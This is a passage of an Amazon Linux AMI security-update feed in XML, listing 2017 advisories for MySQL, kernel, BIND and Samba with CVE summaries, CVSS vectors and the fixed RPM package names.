Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443369:
CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3453:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1443365:
CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3450:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1443363:
CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017)
CVE-2017-3309:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443359:
CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3308:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443358:
CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3265:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Packaging). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS v3.0 Base Score 5.6 (Confidentiality and Availability impacts).
1414423:
CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3265" title="" id="CVE-2017-3265" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3308" title="" id="CVE-2017-3308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3309" title="" id="CVE-2017-3309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3450" title="" id="CVE-2017-3450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3453" title="" id="CVE-2017-3453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3456" title="" id="CVE-2017-3456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3461" title="" id="CVE-2017-3461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3462" title="" id="CVE-2017-3462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3463" title="" id="CVE-2017-3463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3464" title="" id="CVE-2017-3464" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3599" title="" id="CVE-2017-3599" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-server" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.36-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-831</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-831: medium priority package update for mysql55</title><issued date="2017-05-19 00:27:00" /><updated date="2017-05-19 03:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3464:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1443379:
CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017)
CVE-2017-3463:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443378:
CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3462:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443377:
CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3461:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443376:
CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3456:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443369:
CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3453:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1443365:
CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3450:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1443363:
CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017)
CVE-2017-3309:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443359:
CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3308:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443358:
CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3265:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Packaging). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS v3.0 Base Score 5.6 (Confidentiality and Availability impacts).
1414423:
CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3265" title="" id="CVE-2017-3265" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3308" title="" id="CVE-2017-3308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3309" title="" id="CVE-2017-3309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3450" title="" id="CVE-2017-3450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3453" title="" id="CVE-2017-3453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3456" title="" id="CVE-2017-3456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3461" title="" id="CVE-2017-3461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3462" title="" id="CVE-2017-3462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3463" title="" id="CVE-2017-3463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3464" title="" id="CVE-2017-3464" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.56-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-832</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-832: important priority package update for kernel</title><issued date="2017-05-23 23:25:00" /><updated date="2017-05-31 21:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10229:
The Linux kernel allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag. This may create a kernel panic or memory corruption leading to privilege escalation.
1439740:
CVE-2016-10229 kernel: net: Unsafe second checksum calculation in udp.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10229" title="" id="CVE-2016-10229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.17" release="8.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.17-8.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-833</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-833: important priority package update for bind</title><issued date="2017-05-30 23:49:00" /><updated date="2017-05-31 21:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3139:
* A denial of service flaw was found in the way BIND handled DNSSEC validation. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3139" title="" id="CVE-2017-3139" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1202.html" title="" id="RHSA-2017:1202" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-834</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-834: important priority package update for samba</title><issued date="2017-05-30 23:54:00" /><updated date="2017-05-31 21:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7494:
* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root.
CVE-2017-2619:
A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions.
1429472:
